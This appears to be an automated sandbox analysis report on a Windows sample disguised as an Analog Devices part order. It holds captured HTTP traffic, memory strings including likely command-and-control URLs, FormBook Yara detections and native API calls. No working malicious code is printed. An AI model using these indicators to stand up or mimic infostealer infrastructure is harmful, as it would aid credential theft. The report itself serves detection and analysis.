Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 08:25:19 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 08:25:21 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 08:25:24 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 08:25:26 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 16 Jan 2025 08:25:33 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 16 Jan 2025 08:25:35 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31

Source: cvSKtqilyhlQ.exe, 00000006.00000002.3524646475.0000000000968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://server/get.asp
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: cvSKtqilyhlQ.exe, 00000008.00000002.3525202420.0000000002C2A000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.rpa.asia
Source: cvSKtqilyhlQ.exe, 00000008.00000002.3525202420.0000000002C2A000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.rpa.asia/5blw/
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: bitsadmin.exe, 00000007.00000003.2465093183.0000000007868000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: bitsadmin.exe, 00000007.00000003.2465093183.0000000007868000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: bitsadmin.exe, 00000007.00000003.2465093183.0000000007868000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: bitsadmin.exe, 00000007.00000003.2465093183.0000000007868000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: bitsadmin.exe, 00000007.00000003.2465093183.0000000007868000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: bitsadmin.exe, 00000007.00000003.2465093183.0000000007868000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: bitsadmin.exe, 00000007.00000003.2465093183.0000000007868000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: bitsadmin.exe, 00000007.00000002.3524147073.0000000000873000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: bitsadmin.exe, 00000007.00000002.3524147073.0000000000873000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: bitsadmin.exe, 00000007.00000002.3524147073.0000000000873000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: bitsadmin.exe, 00000007.00000002.3524147073.0000000000873000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: bitsadmin.exe, 00000007.00000002.3524147073.0000000000873000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: bitsadmin.exe, 00000007.00000002.3524147073.0000000000873000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: bitsadmin.exe, 00000007.00000003.2454838198.0000000007847000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: bitsadmin.exe, 00000007.00000003.2465093183.0000000007868000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: bitsadmin.exe, 00000007.00000002.3526173862.00000000041CE000.00000004.10000000.00040000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3528139415.0000000005E20000.00000004.00000800.00020000.00000000.sdmp, cvSKtqilyhlQ.exe, 00000008.00000002.3525704940.0000000003C4E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: bitsadmin.exe, 00000007.00000003.2465093183.0000000007868000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2276189498.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3525169174.0000000000C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2276722825.0000000001600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3523964569.00000000006A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3525280527.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3525202420.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3525237052.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2278015136.0000000002520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Contains functionality to call native functions

Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0042C623 NtClose,	2_2_0042C623
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0040AC5E NtAllocateVirtualMemory,	2_2_0040AC5E
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0040AC3D NtAllocateVirtualMemory,	2_2_0040AC3D
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742B60 NtClose,LdrInitializeThunk,	2_2_01742B60
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_01742DF0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_01742C70
